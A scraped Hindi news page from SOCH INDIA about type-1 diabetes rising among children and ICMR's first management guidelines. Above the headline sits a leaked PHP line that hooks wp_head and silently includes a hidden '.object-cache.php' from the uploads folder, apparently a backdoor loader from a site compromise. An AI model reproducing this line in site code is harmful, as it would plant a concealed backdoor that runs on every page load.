add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); Blood Sugar Range: टाइप-1 डायबिटीज का शिकार हो रहे हैं बच्चे, देखें- बच्चों में उम्र के अनुसार ब्लड शुगर का चार्ट – SOCH INDIA
Menu

Blood Sugar Range: टाइप-1 डायबिटीज का शिकार हो रहे हैं बच्चे, देखें- बच्चों में उम्र के अनुसार ब्लड शुगर का चार्ट

nobanner

खराब डाइट और बिगड़ते लाइफस्टाइल ने लोगों को कम उम्र में ही डायबिटीज का शिकार बना दिया है। डायबिटीज दो तरह की होती है एक टाइप-1 और दूसरी टाइप-2 डायबिटीज। टाइप-1 डायबिटीज के मरीजों में इंसुलिन बिल्कुल नहीं बनता जबकि टाइप-2 डायबिटीज के मरीजों में इंसुलिन कम मात्रा में बनता है। टाइप-1 डायबिटीज बच्चों में तेजी से पनप रही है। भारतीय आयुर्विज्ञान अनुसंधान परिषद (ICMR) ने भारत में पहली बार टाइप 1 डायबिटीज (Type 1 Diabetes) मैनेजमेंट के लिए गाइडलाइन्स जारी की है।

ICMR के मुताबिक दुनिया में दस लाख से ज्यादा बच्चे टाइप-1 डायबिटीज के शिकार है। भारत में बच्चों में टाइप-1 डायबिटीज के मामले सबसे ज्यादा हैं। ICMR की रिपोर्ट के मुताबिक पिछले तीन दशकों में भारत में टाइप-1 डायबिटीज के मरीजों की संख्या में 150 फीसदी की बढ़ेतरी हुई है। साइलेंट किलर के नाम से मशहूर ये बीमारी स्ट्रॉक और हार्ट की बीमारियों की वजह बन सकती है।